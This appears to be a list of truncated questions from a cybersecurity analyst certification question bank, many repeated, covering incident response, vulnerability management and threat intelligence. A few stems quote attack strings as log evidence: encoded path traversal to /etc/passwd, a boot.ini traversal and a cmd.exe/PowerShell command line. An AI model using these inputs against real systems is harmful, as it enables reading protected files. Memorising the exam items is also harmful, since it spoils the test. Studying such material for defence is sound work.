- A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connec ...
- A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the ri ...
- A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the following is the best method to ensure the data on ...
- A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and ...
- A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following command ...
- Given the following CVSS string: CVSS:3.0/AV: N/AC: L/PR: N/UI: N/S: U/C: K/I: K/A:H. Which of the following attributes correctly describes this vulnerability?
- A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when pro ...
- Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure e ...
- Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure e ...
- Which of the following risk management principles is accomplished by purchasing cyber insurance?
- A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the ...
- A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https://offce365password.acme.co. The sit ...
- The security analyst received the monthly vulnerability report. The following findings were included in the report: • Five of the systems only required a reboot ...
- Which of the following best describes the goal of a tabletop exercise?
- A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the sp ...
- An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the sy ...
- An organization was compromised, and the usernames and passwords of all employees were leaked online. Which of the following best describes the remediation that ...
- An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with ...
- Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events ...
- Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events ...
- Which of the following best describes the process of requiring remediation of a known threat within a given time frame?
- Which of the following best describes the process of requiring remediation of a known threat within a given time frame?
- Which of the following best describes the process of requiring remediation of a known threat within a given time frame?
- Which of the following is described as a method of enforcing a security policy between cloud customers and cloud services?
- Which of the following is described as a method of enforcing a security policy between cloud customers and cloud services?
- Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?
- Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an inciden ...
- Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an inciden ...
- A Chief Information Security Officer (CISO) is concerned that a specific threat actor who is known to target the company's business type may be able to breach t ...
- While performing a dynamic analysis of a malicious file, a security analyst notices the memory address changes every time the process runs. Which of the followi ...
- While performing a dynamic analysis of a malicious file, a security analyst notices the memory address changes every time the process runs. Which of the followi ...
- An analyst wants to ensure that users only leverage web-based software that has been pre-approved by the organization. Which of the following should be deployed ...
- Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?
- A security analyst is reviewing the findings of the latest vulnerability report for a company's web application. The web application accepts files for a Bash sc ...
- A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the comp ...
- A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the comp ...
- Which of the following makes STIX and OpenIOC information readable by both humans and machines?
- Which of the following best describes the importance of implementing TAXII as part of a threat intelligence program?
- During a recent site survey, an analyst discovered a rogue wireless access point on the network. Which of the following actions should be taken first to protect ...
- During a recent site survey, an analyst discovered a rogue wireless access point on the network. Which of the following actions should be taken first to protect ...
- Which of the following makes STIX and OpenIOC information readable by both humans and machines?
- An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the followin ...
- During an incident, analysts need to rapidly investigate by the investigation and leadership teams. Which of the following best describes how PII should be safe ...
- A security analyst is reviewing the logs of a web server and notices that an attacker has attempted to exploit a SQL injection vulnerability. Which of the follo ...
- An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the followin ...
- A security analyst found the following vulnerability on the companys website: . Which of the following should be implemented to prevent this type of attack in t ...
- A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to mini ...
- Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known source ...
- A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constrain ...
- Which of the following should be updated after a lessons-learned review?
- Which of the following should be updated after a lessons-learned review?
- Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the followin ...
- Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the followin ...
- Which of the following can be used to learn more about TTPs used by cybercriminals?
- After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Window ...
- After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Window ...
- The management team requests monthly KPI reports on the company's cybersecurity program. Which of the following KPIs would identify how long a security threat g ...
- When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop backgr ...
- A Chief Information Security Officer (CISO) wants to disable a functionality on a business-critical web application that is vulnerable to RCE in order to mainta ...
- Which of the following is a nation-state actor least likely to be concerned with?
- Which of the following most accurately describes the Cyber Kill Chain methodology?
- An analyst discovers unusual outbound connections to an IP that was previously blocked at the web proxy and firewall. Upon further investigation, it appears tha ...
- A SOC manager is establishing a reporting process to manage vulnerabilities. Which of the following would be the best solution to identify potential loss incurr ...
- A SOC manager is establishing a reporting process to manage vulnerabilities. Which of the following would be the best solution to identify potential loss incurr ...
- A security analyst detects an email server that had been compromised in the internal network. Users have been reporting strange messages in their email inboxes ...
- A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit info ...
- Which of the following is the most important reason for an incident response team to develop a formal incident declaration?
- Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the env ...
- An analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds continue to work. Which of the following is the most ...
- A security analyst noticed the following entry on a web server log: `Warning: fopen (http://127.0.0.1:16) : failed to open stream: Connection refused in /hj/var ...
- A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following types of activities is being observed?
- An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. ...
- A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project: Must use minimal network bandwidth, Must use mi ...
- A vulnerability management team found four major vulnerabilities during an assessment and needs to provide a report for the proper prioritization for further mi ...
- Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triag ...
- During an incident involving phishing, a security analyst needs to find the source of the malicious email. Which of the following techniques would provide the a ...
- A security analyst needs to provide evidence of regular vulnerability scanning on the company's network for an auditing process. Which of the following is an ex ...
- An employee downloads a freeware program to change the desktop to the classic look of legacy Windows. Shortly after the employee installs the program, a high vo ...
- A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the following should the analyst perform next?
- Which of the following would best mitigate the effects of a new ransomware attack that was not properly stopped by the company antivirus?
- During an internal code review, software called 'ACE' was discovered to have a vulnerability that allows the execution of arbitrary code. The vulnerability is i ...
- Which of the following statements best describes the MITRE ATT&CK framework?
- Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the gen ...
- A security analyst observed the following activity from a privileged account: - Accessing emails and sensitive information - Audit logs being modified - Abnorma ...
- A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following sh ...
- During a security test, a security analyst found a critical application with a buffer overflow vulnerability. Which of the following would be best to mitigate t ...
- An organization discovered a data breach that resulted in PII being released to the public. During the lessons learned review, the panel identified discrepancie ...
- Which of the following would an organization use to develop a business continuity plan?
- A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. ...
- Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastruct ...
- While configuring a SIEM for an organization, a security analyst is having difficulty correlating incidents across different systems. Which of the following sho ...
- An analyst is conducting routine vulnerability assessments on the company infrastructure. When performing these scans, a business-critical server crashes, and t ...
- An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in ...
- A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of the following controls would best mitigate the attacks?
- Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrenc ...
- A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and ha ...
- A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could ...
- A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the follo ...
- A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a h ...
- An organization is conducting a pilot deployment of an e-commerce application. The application's source code is not available. Which of the following strategies ...
- Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas of re ...
- Which of the following actions would an analyst most likely perform after an incident has been investigated?
- An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulne ...
- A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require patching. The SLA requires that the findings be re ...
- A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notif ...
- A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notif ...
- An attacker recently gained unauthorized access to a financial institution's database, which contains confidential information. The attacker exfiltrated a large ...
- A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst ...
- A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment. Which of the followin ...
- A cybersecurity analyst is recording the following details: ID, Name, Description, Classification of information, and Responsible party. In which of the followi ...
- An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party tha ...
- Exploit code for a recently disclosed critical software vulnerability was publicly available for download for several days before being removed. Which of the fo ...
- Exploit code for a recently disclosed critical software vulnerability was publicly available for download for several days before being removed. Which of the fo ...
- When undertaking a cloud migration of multiple SaaS applications, an organization's system administrator struggled with identity and access management to cloud- ...
- A Chief Information Security Officer wants to implement security by design to prevent common application vulnerabilities, including SQL injection, LFI, XSS, etc ...
- Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical vulnerabilities should be patched within 24 hou ...
- Which of the following would likely be used to update a dashboard that integrates with external data sources?
- Which of the following would eliminate the need for different passwords for a variety of internal applications?
- Which of the following would eliminate the need for different passwords for a variety of internal applications?
- A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. ...
- A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notif ...
- When undertaking a cloud migration of multiple SaaS applications, an organization's system administrator struggled with identity and access management to cloud- ...
- An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of the vulnerabilities: CVSS: 3.1 ...
- An organization's threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizin ...
- An incident responder was able to recover a binary file through the network traffic. The binary file was also found in some machines with anomalous behavior. Wh ...
- A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access p ...
- A security administrator needs to import PII data records from the production environment to the test environment for testing purposes. Which of the following w ...
- A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next st ...
- A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Whic ...
- A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the mos ...
- A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the mos ...
- A laptop that is company owned and managed is suspected to have malware. The company implemented centralized security logging. Which of the following log source ...
- During a scan of a web server in the perimeter network, a vulnerability was identified that could be exploited over port 3389. The web server is protected by a ...
- Which of the following is a commonly used four-component framework to communicate threat actor behavior?
- An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the follo ...
- An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gat ...
- A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the foll ...
- Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the ...
- Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the ...
- Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-whe ...
- Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-whe ...
- An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the ...
- An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the ...
- The SOC received a threat intelligence notification indicating that an employee's credentials were found on the dark web. The user's web and log-in activities w ...
- Which of the following best explains the importance of communicating with staff regarding the official public communication plan related to incidents impacting ...
- A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The c ...
- The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its ...
- The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its ...
- A security analyst has prepared a vulnerability scan that contains all of the company's functional subnets. During the initial scan, users reported that network ...
- A high volume of failed RDP authentication attempts was logged on a critical server within a one-hour period. All of the attempts originated from the same remot ...
- An analyst is investigating a phishing incident and has retrieved the following as part of the investigation: cmd.exe /c c:\Windows\System32\WindowsPowerShell\v ...
- Which of the following best describes the key goal of the containment stage of an incident response process?
- When undertaking a cloud migration of multiple SaaS applications, an organization's system administrator struggled with identity and access management to cloud- ...
- A cybersecurity analyst has been assigned to the threat-hunting team to create a dynamic detection strategy based on behavioral analysis and attack patterns. Wh ...
- A development team is preparing to roll out a beta version of a web application and wants to quickly test for vulnerabilities, including SQL injection, path tra ...
- An organization has a critical financial application hosted online that does not allow event logging to send to the corporate SIEM. Which of the following is th ...
- Which of the following will most likely cause severe issues with authentication and logging?
- A list of IoCs released by a government security organization contains the SHA-256 hash for a Microsoft-signed legitimate binary, svchost.exe. Which of the foll ...
- A SOC analyst determined that a significant number of the reported alarms could be closed after removing the duplicates. Which of the following could help the a ...
- A company is launching a new application in its internal network, where internal customers can communicate with the service desk. The security team needs to ens ...
- A company is launching a new application in its internal network, where internal customers can communicate with the service desk. The security team needs to ens ...
- Which of the following explains the importance of a timeline when providing an incident response report?
- An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is ...
- A security administrator has found indications of dictionary attacks against the company's external-facing portal. Which of the following should be implemented ...
- Which of the following best explains the importance of the implementation of a secure software development life cycle in a company with an internal development ...
- Which of the following is the best reason to implement an MOU?
- A SOC analyst observes reconnaissance activity from an IP address. The activity follows a pattern of short bursts toward a low number of targets. An open-source ...
- A new SOC manager reviewed findings regarding the strengths and weaknesses of the last tabletop exercise in order to make improvements. Which of the following s ...
- K company has recently experienced a security breach via a public-facing service. Analysis of the event on the server was traced back to the following piece of ...
- A report contains IoC and TTP information for a zero-day exploit that leverages vulnerabilities in a specific version of a web application. Which of the followi ...
- Which of the following best explains the importance of network micro-segmentation as part of a Zero Trust architecture?
- Which of the following best explains the importance of network micro-segmentation as part of a Zero Trust architecture?
- A network security analyst for a large company noticed unusual network activity on a critical system. Which of the following tools should the analyst use to ana ...
- A network security analyst for a large company noticed unusual network activity on a critical system. Which of the following tools should the analyst use to ana ...
- A Chief Information Security Officer wants to lock down the users' ability to change applications that are installed on their Windows systems. Which of the foll ...
- A Chief Information Security Officer (CISO) has determined through lessons learned and an associated after-action report that staff members who use legacy appli ...
- Which of the following is most appropriate to use with SOAR when the security team would like to automate actions across different vendor platforms?
- Executives at an organization email sensitive financial information to external business partners when negotiating valuable contracts. To ensure the legal valid ...
- Which of the following in the digital forensics process is considered a critical activity that often includes a graphical representation of process and operatin ...
- A SOC team lead occasionally collects some DNS information for investigations. The team lead assigns this task to a new junior analyst. Which of the following i ...
- A systems administrator needs to gather security events with repeatable patterns from Linux log files. Which of the following would the administrator most likel ...
- A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notif ...
- Which of the following is a nation-state actor least likely to be concerned with?
- A security analyst investigates a malware alert from a critical system. The following information is present in the ticket: Which of the following should the a ...
- A company classifies security groups by risk level. Any group with a high-risk classification requires multiple levels of approval for member or owner changes. ...
- Which of the following is a circumstance in which a security operations manager would most likely consider using automation?
- A security analyst is comparing the results of the past and current active credentialed vulnerability scans. Which of the following should the analyst do next?
- After inspecting the request, the security analyst notices that it does not include any additional protections or validation mechanisms. Which of the following ...
- Which of the following best explains the reason system hardening is essential for servers?
- A security analyst must assist the IT department with creating a phased plan for vulnerability patching that meets established SLAs. Which of the following vuln ...
- Which of the following responsibilities does the legal team have during an incident management event? (Select two).
- Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system, application, or user base is aff ...
- A security analyst is implementing a process to perform vulnerability management on an OT environment: Systems must remain on an isolated network. The process ...
- A security analyst is implementing a process to perform vulnerability management on an OT environment: Systems must remain on an isolated network. The process ...
- Which of the following is the appropriate phase in the incident response process to perform a vulnerability scan to determine the effectiveness of corrective ac ...
- A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Whic ...
- Security analysts can review the Windows Registry on endpoints to get insights into:
- An analyst reviews the following web server log entries: %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd No attacks or malicious attempts have been disco ...
- A DevOps analyst must include code scanning in the current CI/CD pipeline. The company decided not to invest in a different system, so the analyst has found a l ...
- After a series of UEBA alerts, a company’s SOC observes an extended period of suspicious outbound traffic all with the same destination. Which of the following ...
- To comply with regulatory requirements, the Chief Executive Officer (CEO) must lead the company through simulations to find which steps are missing in emergency ...
- A security analyst needs to provide evidence of regular vulnerability scanning on the company's network for an auditing process. Which of the following is an ex ...
- During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would be ...
- Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure that it will not be detected b ...
- Which of the following is instituting a security policy that users must lock their systems when stepping away from their desks an example of?
- Which of the following is the most important reason for an incident response team to develop a formal incident declaration?
- Which of the following is the best reason to implement an MOU?
- An organization wants to establish a disaster recovery plan for critical applications that are hosted on premises. Which of the following is the first step to p ...
- A company wants to implement protection mechanisms after an incident in which customer information was sent to a third party. Which of the following tools shoul ...
- When undertaking a cloud migration of multiple SaaS applications, an organization’s systems administrators struggled with the complexity of extending identity a ...
- A SOC analyst prepares data to train an AI model in order to automate threat detection and integrate with threat intelligence feeds for security operations. Whi ...
- Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?
- An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has: created the initial evidence l ...
- The SOC received a threat intelligence notification indicating that an employee’s credentials were found on the dark web. The user’s web and login activities we ...
- A Chief Information Security Officer wants to map all of the attack vectors that the company faces each day. Which of the following recommendations should the c ...
- Which of the following risk management decisions should be considered after evaluating all other options?
- Which of the following is the term for a predefined set of automated actions that incident responders and SOC analysts can use to enhance operations?
- A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. ...
- Which of the following are process improvements that can be realized by implementing a SOAR solution? (Select two).
- A security analyst runs an Nmap scan against a host with multiple open ports using the following command: nmap 10.10.10.1 -p- The following output is obta ...
- A security analyst notices multiple attempts of the same exploit being made on the perimeter network. The behavioral patterns indicate that a TCP SYN flood atta ...
- An e-commerce organization recently experienced a cyberattack. During a lessons learned meeting, a cybersecurity analyst requests that the RTO is prioritized. W ...
- A security team has recently recovered from an incident in which malware bypassed the endpoint protection and exploited a missing software patch. To prevent reo ...
- Which of the following is the appropriate phase in the incident response process to perform a vulnerability scan to determine the effectiveness of corrective ac ...
- Which of the following statements best describes the MITRE ATT&CK framework?
- An analyst is imaging a hard drive that was obtained from the system of an employee who is suspected of going rogue. The analyst notes that the initial hash of ...
- While reviewing the web server logs, a security analyst notices the following snippet: ..\..\..\boot.ini Which of the following is being attempted?
- Which of the following is the best reason to implement an MOU?
- During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related t ...
- Which of the following entities must receive reports in a timely fashion according to data breach notification laws related to personally identifiable informati ...
- A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiali ...
- A security analyst is implementing a process to perform vulnerability management on an OT environment: Systems must remain on an isolated network. The pro ...
- The website of a large retail chain is failing to enforce encrypted HTTPS connections, leaving customer account credentials exposed. Which of the following is t ...
- An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the follo ...
- Which of the following actions should an incident response analyst take during the recovery phase of the incident response process?
- An incident response manager conducts a tabletop exercise. Which of the following steps should the incident response manager take next?
- A Chief Information Security Officer wants to lock down the users' ability to change applications that are installed on their Windows systems. Which of the foll ...
- Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?
- During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner, and ...
- Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?
- A Chief Information Security Officer (CISO) is notified of an ongoing incident. Which of the following explains why the CISO instructs the Chief Executive Offic ...
- A security analyst must assist the IT department with creating a phased plan for vulnerability patching that meets established SLAs. Which of the following vuln ...
- A security analyst reviews the following extract of a vulnerability scan that was performed against the web server: Which of the following recommendations sh ...
- A company has decided to expose several systems to the internet. The systems are currently only available internally. A security analyst is using a subset of CV ...
- A security analyst needs to prioritize vulnerabilities for patching. Given the following vulnerability and system information: Which of the following systems ...
- During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would be ...
- Which of the following best describes the process of requiring remediation of a known threat within a given time frame?
- Which of the following is the most likely reason for an organization to assign different internal departmental groups during the post-incident analysis and impr ...
- A company reports that user plain text credentials have been disclosed from their network. A security analyst is identifying the vulnerability and runsa scan to ...
- A critical server hosting final exams for an educational institution fails while students are taking their exams. The final exam deadline is in 16 hours. Which ...
- Which of the following is instituting a security policy that users must lock their systems when stepping away from their desks an example of?
- Which of the following is the best framework for assessing how attackers use techniques over an infrastructure to exploit a target's information assets?
- An analyst reviews alerts that indicate a number of different users had a spike in login attempts from the same IP. Using the security information and event man ...
- The Chief Information Security Officer wants the same level of security to be present whether a remote worker logs in at home or at a coffee shop. Which of the ...
- Which of the following best explains the importance of communicating with staff regarding the official public communication plan related to incidents impacting ...
- A web developer reports the following error that appeared on a development server when testing a new application: Which of the following tools can be used to ...
- A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project: Must use minimal network bandwidth Must u ...
- Which of the following entities should an incident manager work with to ensure that correct processes are adhered to when communicating incident reporting to th ...
- Which of the following describes a risk that exists before implementing security controls?
- During an investigation, an analyst discovers that a host is infected with malware. The analyst is concerned that the malware may spread. Which of the following ...
- A company's security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptomi ...
- A security analyst has just received an incident ticket regarding a ransomware attack. Which of the following would most likely help an analyst properly triage ...
- A systems administrator receives several reports about emails containing phishing links. The hosting domain is always different, but the URL follows a specific ...
- A vulnerability management team found four major vulnerabilities during an assessment and needs to provide a report for the proper prioritization for further mi ...
- An organization's server policies include the following requirements: • Unnecessary ports must be closed. Data in transit must be encrypted. • Database serve ...
- A company wants to implement protection mechanisms after an incident in which customer information was sent to a third party. Which of the following tools shoul ...
- During the rollout of a patch to the production environment, it was discovered that required connections to remote systems are no longer possible. Which of the ...
- A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer has to jump between tools. ...
- A red team engineer discovers that analyzing multiple pieces of less sensitive public information results in knowledge of a sensitive piece of confidential info ...
- A cybersecurity analyst receives an urgent notification through the ticketing system. After reviewing the request, the analyst places a security lock on hundred ...
- An organization performs software assurance activities and reviews some web framework code that uses exploitable jQuery modules. Which of the following tools or ...
- A security analyst is analyzing two vulnerabilities on a critical router. The analyst must choose only one to patch during this maintenance window. Given the fo ...
- An analyst prepares an after action report following an incident in which multiple systems were compromised over several days. The analyst provides raw event lo ...
- An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the followin ...
- Which of the following best explains the importance of playbooks for incident response teams?
- When undertaking a cloud migration of multiple SaaS applications, an organization's systems administrators struggled with the complexity of extending identity a ...
- A vulnerability analyst needs to review a list of top-level domains owned by a company: comptia.com comptia.org comptia.net Which of the following tools sho ...
- A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst ...
- An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with ...
- A threat intelligence analyst is updating a document according to the MITRE ATT&CK framework. The analyst detects the following behavior from a malicious actor: ...
- An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of the vulnerabilities: CVSS: 3. ...
- An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the foll ...
- Which of the following choices is most likely to cause obstacles in vulnerability remediation?
- Which of the following best describes root cause analysis?
- A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attac ...
- A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Whic ...
- A security analyst received an alert regarding multiple successful MFA log-ins for a particular user. When reviewing the authentication logs, the analyst sees t ...
- A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application: getConnection(database01, "al ...
- During an internal code review, software called “ACE” was discovered to have a vulnerability that allows the execution of arbitrary code. The vulnerability is i ...
- An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. ...
- Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system, application, or user base is aff ...
- A spillage incident results in the access of controlled information across multiple unauthorized business units. Which of the following response techniques shou ...
- Which of the following would the vulnerability team most likely do to determine remediation prioritization?
- An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in ...
- Which of the following is the best technical method to protect sensitive data at an organizational level?
- A security analyst needs to identify an asset that should be remediated based on the following information. Which of the following assets should the analyst rem ...
- A Chief Information Security Officer has requested a dashboard to share critical vulnerability management goals with company leadership. Which of the following ...
- An MSSP received several alerts from customer 1, which caused a missed incident response deadline for customer 2. Which of the following best describes the docu ...
- A security manager has decided to form a special group of analysts who participate in both penetration testing and defending the company's network infrastructur ...
- A new SOC manager reviewed findings regarding the strengths and weaknesses of the last tabletop exercise in order to make improvements. Which of the following s ...
- Which of the following is a reason proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident re ...
- A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access p ...
- Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure that it will not be detected b ...
- A security analyst is assessing the security of a cloud environment. The following output is generated when the assessment runs: Authentication error Instance ...
- A cybersecurity analyst receives an unstructured text document that contains advanced persistent threat (APT)-related indicators of compromise (IoCs). The analy ...
- An incident responder was able to recover a binary file through the network traffic. The binary file was also found in some machines with anomalous behavior. Wh ...
- A security analyst is identifying vulnerabilities in laptops. Users often take their laptops out of the office while traveling, and the vulnerability scan metri ...
- Which of the following will inhibit remediation when attempting to resolve a vulnerability?
- A vendor releases details of a new vulnerability. When an analyst reviews the scheduled scans, no vulnerabilities are identified. The vulnerability is only disc ...
- An organization’s server policies include the following requirements. Based on the scan output, which of the following hosts is violating the organization’s pol ...
- A web developer reports the following error that appeared on a development server when testing a new application. Which of the following tools can be used to id ...
- An analyst wants to detect outdated software packages on a server. Which of the following methodologies will achieve this objective?
- An analyst uses an AI platform to help correlate events. The AI output contains events that did not happen. This results in inaccurate correlations. Which of th ...
- A company completes a System and Organization Controls 2 (SOC 2) readiness assessment. The Chief Information Security Officer (CISO) makes the control owner res ...
- An organization has tracked several incidents that are listed in the following table. Which of the following is the organization’s MTTD?
- Which of the following activities during the preparation phase of the incident response process supports the detection phase?
- The security team reviews a web server for XSS and runs the following Nmap scan. Which of the following most accurately describes the result of the scan?
- An analyst wants to track how quickly vulnerabilities are identified. Which of the following would be the best metric?
- An organization wants to establish a disaster recovery plan for critical applications that are hosted on premises. Which of the following is the first step to p ...
- A company's internet-facing web application has been compromised several times due to identified design flaws. The company would like to minimize the risk of th ...
- A security analyst identifies a device on which different malware was detected multiple times even after the systems were scanned and cleaned several times. Whi ...
- A cybersecurity analyst is recommending a solution to ensure emails that contain links or attachments are tested before they reach a mail server. Which of the f ...
- A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constrain ...
- Which of the following is the most important reason a company would use APIs instead of scripts to enable communication between tools from different vendors?
- Which of the following security operations tasks are ideal for automation?
- A team lead asks an analyst to integrate multiple security tools to provide an enhanced view into data that is not readily available in the tool console. Which ...
- A company's internet-facing web application has been compromised several times due to identified design flaws. The company wants to minimize the risk of recurre ...
- A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which option best explains how the analyst should pro ...
- An analyst wants to detect outdated software packages on a server. Which methodology will achieve this objective?
- An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which should the analyst focus on to move the incident ...
- Which of the following is the most important reason a company would use APIs instead of scripts to enable communication between tools from different vendors?
- A vulnerability analyst runs a credentialed vulnerability scan across all enterprise assets and finds many critical vulnerabilities that cannot be immediately r ...
- A security analyst identifies a device where different malware continues to be detected multiple times even after repeated scans and cleanings. Which action wou ...
- Which phase of the incident response process will permanently remove an attacker's access to corporate resources?
